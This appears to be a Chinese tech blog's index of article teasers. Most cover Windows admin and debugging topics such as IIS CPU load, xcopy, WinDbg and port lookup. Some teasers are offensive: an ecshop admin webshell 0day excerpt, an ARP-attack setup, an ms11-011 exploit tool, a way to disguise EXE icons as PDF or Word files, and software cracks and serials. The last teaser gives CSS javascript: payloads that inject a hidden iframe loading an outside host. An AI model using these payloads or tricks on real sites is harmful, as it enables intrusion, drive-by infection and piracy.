关于w3wp.exe进程cpu占有率高的分析 前两天，我管理的一台开放式的服务器平台（虚拟主机，上面有30个网站）出现网站访问非常慢的情况，公司让马上解决。

我远程登陆服务器查看，w3wp.exe进程cpu占有率一直占用最高，基本上维持在60％-100％之间，w3wp.exe进程在瞬间上升到100％是可能的，但是一直占用维持在60％-100％之间，这个肯定不正常；

下

查看更多...

Tags: iis 占资源 cpu w3wp.exe

查看更多...

Tags: VS2008序列号 VS2008注册码

首先来看一下xcopy的语法。

XCOPY source [destination] [/A | /M] [/D[:date]] [/P] [/S [/E]] [/V] [/W]
                           [/C] [/I] [/Q] [/F] [/L] [/G] [/H] [/R] [/T] [/U]
                           [/K] [/N] [/O] [/X] [/Y] [/-Y] [/Z] [/B]
                           [/EXCLUDE:file1[+file2][+file3]...]

查看更多...

Tags: xcopy 复制目录 命令行

DLL

该扩展仅在内核模式下使用，即使它是在Ext.dll中的。

注释

如果不提供参数，调试器会列出所有进程，以及时间和优先级统计。这和使用!process @#Process 0 作为CommandString值一样。

To terminate execution at any point, press CTRL+BREAK (in WinDbg) or CTRL+C (in KD).

附加信息

关于进程的一般信息，查看线程和进程。进程操作和获取进程信息，查看控制进程和线程。

!for_each_thread

!for_each_thread 扩展对目标机中每个线程执行一次指定的调试器命令。

查看更多...

Tags: windbg WINDBG教程 windbg命令

查看更多...

Tags: windbg windbg命令 WINDBG教程

命令

==========

k

k命令显示的是一定数量的栈帧, 其中帧的数量是由.kframes命令来控制的, 默认值是256。

kp 5

显示调用栈中前5个函数以及他们的参数.

kb 5

显示调用栈中前五个函数以及他们的前三个参数.

kf 5

显示在调用栈中五个函数所使用的栈的大小.

查看更多...

Tags: windbg 调用栈

bp 命令是在某个地址下断点， 可以 bp 0x7783FEB 也可以 bp MyApp!SomeFunction 。 对于后者，WinDBG 会自动找到MyApp!SomeFunction 对应的地址并设置断点。 但是使用bp的问题在于：1）当代码修改之后，函数地址改变，该断点仍然保持在相同位置，不一定继续有效； 2）WinDBG 不会把bp断点保存工作空间中 。 所以，我比较喜欢用bu 命令。

查看更多...

Tags: windbg WINDBG教程 windbg断点

照上面的用法用就可以了，不多说了。

查看更多...

Tags: ms11-011利用工具 ms11-011工具 ms11-011

FileSystemObject 用户指南
FileSystemObject 对象模式

FileSystemObject 和 Scripting 运行时库参考的介绍

FileSystemObject 对象

设计 FileSystemObject

查看更多...

Tags: fso参考手册 asp fso

假设我发现了我机器上的7899端口被占用了，我想知道是哪个进程占用了这个端口怎么办？

首先，打开cmd

输入netstat -aon|findstr "0.0.0.0:7899"

C:\Users\Administrator>netstat -ano|findstr "0.0.0.0:7899"
  TCP    0.0.0.0:7899           0.0.0.0:0              LISTENING       2656

查看更多...

Tags: 端口 进程 占用

------------------------------------------------------------------------------
Title:ecshop后台写shell 0day
Author: xhm1n9[ESST]
EMail:xhm1n9@0x70.com
Site: http://www.x-xox-x.net
Date: 2010-12-27 10:22:15
From: http://x-xox-x.net/exploit/11

3月份的东西，现在发出来。
adminedit_languages.php

    相关变量没过滤!

    elseif ($_REQUEST['act'] == 'edit')
{
    /* 语言项的路径 */
    $lang_file = isset($_POST['file_path']) ? trim($_POST['file_path']) : '';

    /* 替换前的语言项 */
    $src_items = !empty($_POST['item']) ? stripslashes_deep($_POST['item']) : '';

查看更多...

Tags: ecshop webshell ecshop拿shell

学习了下，顺便加点注释。这个程序比较简单，主要练习了两个点：
（1）模拟发送IRP
（2）使用内核事件对象同步IRP的执行

强制删除文件的思路很简单，把SECTION_OBJECT_POINTERS结构的DataSectionObject和ImageSectionObject两个域清空即可删除正在运行的文件。如果不清空就不能删除运行中的文件。正在运行的文件的这两个域值不为0而文件系统正在根据这两个域决定该文件是否可以删除。如果文件系统检测这两个值为0，就理解为文件没有被使用，可以删除。接下去，就是直接发IRP。

测试时，在C盘目录下放一个test.exe并执行，然后加载驱动即可。
强制删除文件功能在ForceDeleteFile中实现，DriverEntry中只需要简单调用即可。具体实现如下

查看更多...

Tags: 发irp 强制删除 删除文件

最近遇到了这样个问题：编程实现修改EXE程序的图标，比如把一个EXE程序图标改为pdf、word等图标。。。。。
问题终于解决了，其中最主要的就是涉及到资源函数的相应操作。故发此文。。。。。。。。。

1、FindResource函数：该函数确定指定模块中指定类型和名称的资源所在位置。
HRSRC FindResource(
HMODULE hModule,  //资源所在EXE、DLL模块句柄；
LPCWSTR lpName,  //资源名称
LPCWSTR lpType );  //资源类型
返回值：成功则返回资源句柄，将此句柄传递给LoadResource函数。
注意：如果参数lpType或lpName的高字节为O，那么其低字节中所给定的资源的类

型或名称标识说明。另外，这些参数指向以NULL为终止符的字符串。字符串的第

一个字符是＃，后面的字符表示十进制数来表示源类型或名称的整数标识符。例

查看更多...

DLL中导出全局变量

　　DLL定义的全局变量可以被调用进程访问；DLL也可以访问调用进程的全局数据，我们来看看在应用工程中引用DLL中变量的例子

查看更多...

Tags: dll 导出变量 全局变量

vc 模块定义 (.def) 文件2008年08月03日 星期日 16:33模块定义 (.def) 文件为链接器提供有关被链接程序的导出、属性及其他方面的信息。生成 DLL 时，.def 文件最有用。由于存在可代替模块定义语句使用的链接器选项，通常不需要 .def 文件。也可以将 __declspec(dllexport) 用作指定导出函数的手段。

在链接器阶段可以使用 /DEF（指定模块定义文件）链接器选项调用 .def 文件。

如果生成的 .exe 文件没有导出，使用 .def 文件将使输出文件较大并降低加载速度。

有关更多信息，请参见下列章节：

查看更多...

Tags: def vc vc 模块定义(def) 文件

ultraedit16.20序列号

闲话不说，直接上破解方法。

首先下载官网的软件：地址（http://www.ultraedit.com/files/ue_chinese.zip）

安装。

查看更多...

Tags: ultraedit16.20序列号 ultraedit16.20补丁

说到底我不是个电影迷，也不经常看电影，不太懂这种处理技巧。昨天看镖行天下前传的时候，声音和视频错位很严重，足足有五六秒吧，看了很不爽。后来看着看着我突发奇想，不算完美的解决了这个问题。所以写出来跟大家分享。

其实方法很简单。就是开两个视频，把其中一个的声音关掉，然后调整另外一个视频的进度，就可以把音频调整到合适的位置。因为我是用qvod看的，所以一边在网页上看视频，后台用qvod放出声音就可以了。

Tags: 视频和声音错位 视频和声音不一致

蹭网，不用说大家都知道。就是用一个大功率的无线网卡，破解了人家的密码，然后在别人不知情的情况下连接路由器上网。这里不多说，直接说说怎么防止蹭网。

先说说怎么发现蹭网吧。

1. 因为我现在用的是win7，所以以win7为例。打开计算机，点击一下左侧的那个网络标志。就会发现局域网中的一些机器。看看有米有不认识的，不认识的话去找你的同伴问问他的计算机名。当然盗网者也可以设置不被发现。这样这种方法就失效了。
2. 说说第二种方法。打开浏览器，输入路由器的地址，比如是192.168.1.1。登陆之后点击左侧的DHCP服务器，然后点击客户端列表。这样就会发现所有的电脑。这种方法的可靠之处在于可以发现所有的电脑，所以大家可以根据计算机名，或者MAC地址去核对有没有人蹭网。

有这两种方法基本上就可以发现蹭网者了。

如何知道自己的MAC地址？好我告诉你两个方法。

1. 打开计算机，右击左侧的网络图标，选择属性。来到网络和共享中心。单击右边的本地连接，然后单击详细信息按钮。这时可以看到自己的物理地址，也就是MAC地址了。00-D8-A1-40-9F-62，一般是这种格式。
2. 第二种方法更简单，用到了命令行。按一下快捷键win+R打开运行对话框，输入cmd，出现命令提示符窗口。输入ipconfig /all 也可以看到自己的物理地址。

查看更多...

Tags: 如何防止蹭网

以下讨论的机子有
一个要攻击的机子：10.5.4.178
硬件地址：52:54:4C:98:EE:2F
我的机子： :10.5.3.69
硬件地址：52:54:4C:98:ED:C5
网关： 10.5.0.3
硬件地址：00:90:26:3D:0C:F3
一台交换机另一端口的机子：10.5.3.3
硬件地址：52:54:4C:98:ED:F7

查看更多...

网上流行的:
body
{
background-image: url('javascript:document.write("<Iframe src=http://192.168.0.5/test.htm width=0 height=0></iframe>")')
}
//此方法会使主页不正常.返回一片空白.
用弹窗.
body
{
background-image: url('javascript:open("http://192.168.0.5/test.htm")')
}
//弹出一个框.难看 易被发现.
改进一下:

查看更多...